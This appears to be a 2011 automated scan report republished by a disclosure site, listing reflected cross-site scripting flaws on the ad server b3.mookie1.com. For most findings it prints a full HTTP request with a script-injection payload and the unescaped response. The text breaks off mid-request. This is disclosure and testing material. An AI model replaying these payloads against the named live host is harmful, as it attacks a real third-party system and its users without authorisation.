XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, b3.mookie1.com

Report generated by XSS.CX at Thu Aug 18 08:26:27 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in b3.mookie1.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 2]

1.2. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 3]

1.3. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 4]

1.4. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 5]

1.5. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 6]

1.6. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 7]

1.7. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

1.8. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

1.9. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

1.10. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 2]

1.11. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 3]

1.12. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 4]

1.13. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 5]

1.14. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 6]

1.15. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 7]

2. HTML does not specify charset

2.1. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90

2.2. http://b3.mookie1.com/2/B3DM/DLX/1@x71

2.3. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90

3. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 15 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 586b3"><script>alert(1)</script>fd5d373da6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3586b3"><script>alert(1)</script>fd5d373da6f/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.adweek.com/news/television/tweets-rate-abc-cw-tops-fall-134203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 351
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3586b3"><script>alert(1)</script>fd5d373da6f/ATT/DemGen_11Q3/BBN_Di/728/300436367/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.2. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cb57"><script>alert(1)</script>c4ecd9035a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/ATT4cb57"><script>alert(1)</script>c4ecd9035a5/DemGen_11Q3/BBN_Di/728/1269004436@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.adweek.com/news/television/tweets-rate-abc-cw-tops-fall-134203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 351
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/ATT4cb57"><script>alert(1)</script>c4ecd9035a5/DemGen_11Q3/BBN_Di/728/424619267/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.3. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671e0"><script>alert(1)</script>b6a54dfe7d0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/ATT/DemGen_11Q3671e0"><script>alert(1)</script>b6a54dfe7d0/BBN_Di/728/1269004436@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.adweek.com/news/television/tweets-rate-abc-cw-tops-fall-134203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 351
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/ATT/DemGen_11Q3671e0"><script>alert(1)</script>b6a54dfe7d0/BBN_Di/728/338106211/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.4. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b9dc"><script>alert(1)</script>a898bbb80ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/ATT/DemGen_11Q3/BBN_Di4b9dc"><script>alert(1)</script>a898bbb80ea/728/1269004436@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.adweek.com/news/television/tweets-rate-abc-cw-tops-fall-134203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 351
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/ATT/DemGen_11Q3/BBN_Di4b9dc"><script>alert(1)</script>a898bbb80ea/728/477107002/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.5. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a022f"><script>alert(1)</script>50f86d23164 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/ATT/DemGen_11Q3/BBN_Di/728a022f"><script>alert(1)</script>50f86d23164/1269004436@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.adweek.com/news/television/tweets-rate-abc-cw-tops-fall-134203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 351
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/ATT/DemGen_11Q3/BBN_Di/728a022f"><script>alert(1)</script>50f86d23164/221521839/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.6. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a98c"><script>alert(1)</script>ded47c83d85 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x903a98c"><script>alert(1)</script>ded47c83d85 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.adweek.com/news/television/tweets-rate-abc-cw-tops-fall-134203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/ATT/DemGen_11Q3/BBN_Di/728/1659179903/x903a98c"><script>alert(1)</script>ded47c83d85/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.7. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b08"><script>alert(1)</script>fce45bf1d87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM61b08"><script>alert(1)</script>fce45bf1d87/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1417893429@x23?USNetwork/ATT_DemGen_11Q3_247_BBN_Di_728
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:51:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM61b08"><script>alert(1)</script>fce45bf1d87/DLX/278743928/x71/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top"><IMG SRC
...[SNIP]...

1.8. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30c02"><script>alert(1)</script>ee3df7c2248 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX30c02"><script>alert(1)</script>ee3df7c2248/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1417893429@x23?USNetwork/ATT_DemGen_11Q3_247_BBN_Di_728
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:51:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX30c02"><script>alert(1)</script>ee3df7c2248/1541632537/x71/default/empty.gif/4d686437616b354e4750554143347542?x" target="_top"><IMG SR
...[SNIP]...

1.9. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b07d5"><script>alert(1)</script>7c06b5c6b4a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x71b07d5"><script>alert(1)</script>7c06b5c6b4a HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1417893429@x23?USNetwork/ATT_DemGen_11Q3_247_BBN_Di_728
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:51:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/525353505/x71b07d5"><script>alert(1)</script>7c06b5c6b4a/default/empty.gif/4d686437616b354e4750554143347542?x" target="_top"><IMG SRC
...[SNIP]...

1.10. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cfc3"><script>alert(1)</script>6bf04e3a3dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB34cfc3"><script>alert(1)</script>6bf04e3a3dc/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://tracker.bidder7.mookie1.com/tr-apx?cb=1313675488&a=eb79ff32-26c1-4fc4-8ff1-b820ea1deed3&b=1&c=10000470&cr=1222&p=2.629213&u=3539656946931560696&z=-05:00&d=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; dlx_XXX=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 394
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB34cfc3"><script>alert(1)</script>6bf04e3a3dc/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3/270597801/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.11. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1eab"><script>alert(1)</script>d0178fb1b3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/ATTWa1eab"><script>alert(1)</script>d0178fb1b3b/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://tracker.bidder7.mookie1.com/tr-apx?cb=1313675488&a=eb79ff32-26c1-4fc4-8ff1-b820ea1deed3&b=1&c=10000470&cr=1222&p=2.629213&u=3539656946931560696&z=-05:00&d=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; dlx_XXX=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/ATTWa1eab"><script>alert(1)</script>d0178fb1b3b/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3/1806258350/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.12. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4b9"><script>alert(1)</script>128efcae1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/ATTW/RTB_11Q36d4b9"><script>alert(1)</script>128efcae1a/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://tracker.bidder7.mookie1.com/tr-apx?cb=1313675488&a=eb79ff32-26c1-4fc4-8ff1-b820ea1deed3&b=1&c=10000470&cr=1222&p=2.629213&u=3539656946931560696&z=-05:00&d=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
